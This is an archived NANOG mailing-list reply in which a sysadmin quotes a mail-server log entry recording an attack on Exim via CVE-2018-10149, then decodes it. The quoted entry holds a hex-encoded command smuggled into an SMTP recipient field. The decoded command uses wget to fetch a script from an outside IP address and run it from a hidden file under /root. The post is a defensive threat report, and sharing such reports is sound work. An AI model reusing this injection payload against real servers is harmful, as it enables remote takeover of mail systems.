nanog mailing list archives
Re: Russian Anal Probing + Malware
From: Andy Smith <andy () strugglers net>
Date: Sun, 23 Jun 2019 04:04:13 +0000
Hello, On Sat, Jun 22, 2019 at 11:01:13AM -0600, Keith Medcalf wrote:
What malware slinging?
Some user there is trying to exploit CVE-2018-10149: 2019-06-11 11:28:35 SMTP protocol synchronization error (next input sent too soon: pipelining was not advertised): rejected "RCPT TO:<bin+${run{\x2fbin\x2fsh\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2eyyearz\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyyearz\x20\x2dn\x20\x26\x22}}@myhostname>" H=(myhostname) [89.248.171.57] next input="QUIT\n" Plus another 17 attempts by that IP through to 19 June. $ printf "\x2fbin\x2fsh\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2eyyearz\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyyearz\x20\x2dn\x20\x26\x22\n" /bin/sh -c "wget --no-check-certificate -T 36 hxxps://185.162.235.211/ldm1ip -O /root/.yyearz && sh /root/.yyearz -n &" (I replaced https with hxxps to prevent auto-link-followers from hitting the site.) Cheers, Andy
Current thread:
- Russian Anal Probing + Malware Ronald F. Guilmette (Jun 21)
- RE: Russian Anal Probing + Malware Keith Medcalf (Jun 22)
- Re: Russian Anal Probing + Malware Troy Mursch (Jun 22)
- Re: Russian Anal Probing + Malware Andy Smith (Jun 22)
- Re: Russian Anal Probing + Malware Ronald F. Guilmette (Jun 22)
- Re: Russian Anal Probing + Malware Filip Hruska (Jun 22)
- Re: Russian Anal Probing + Malware Dan Hollis (Jun 23)
- Re: Russian Anal Probing + Malware Randy Bush (Jun 23)
- Re: Russian Anal Probing + Malware Dan Hollis (Jun 23)
- Re: Russian Anal Probing + Malware Hank Nussbacher (Jun 23)
- Re: Russian Anal Probing + Malware Tom Beecher (Jun 24)
- Re: Russian Anal Probing + Malware Dan Hollis (Jun 23)
- RE: Russian Anal Probing + Malware Keith Medcalf (Jun 22)
- Re: Russian Anal Probing + Malware Andy Smith (Jun 23)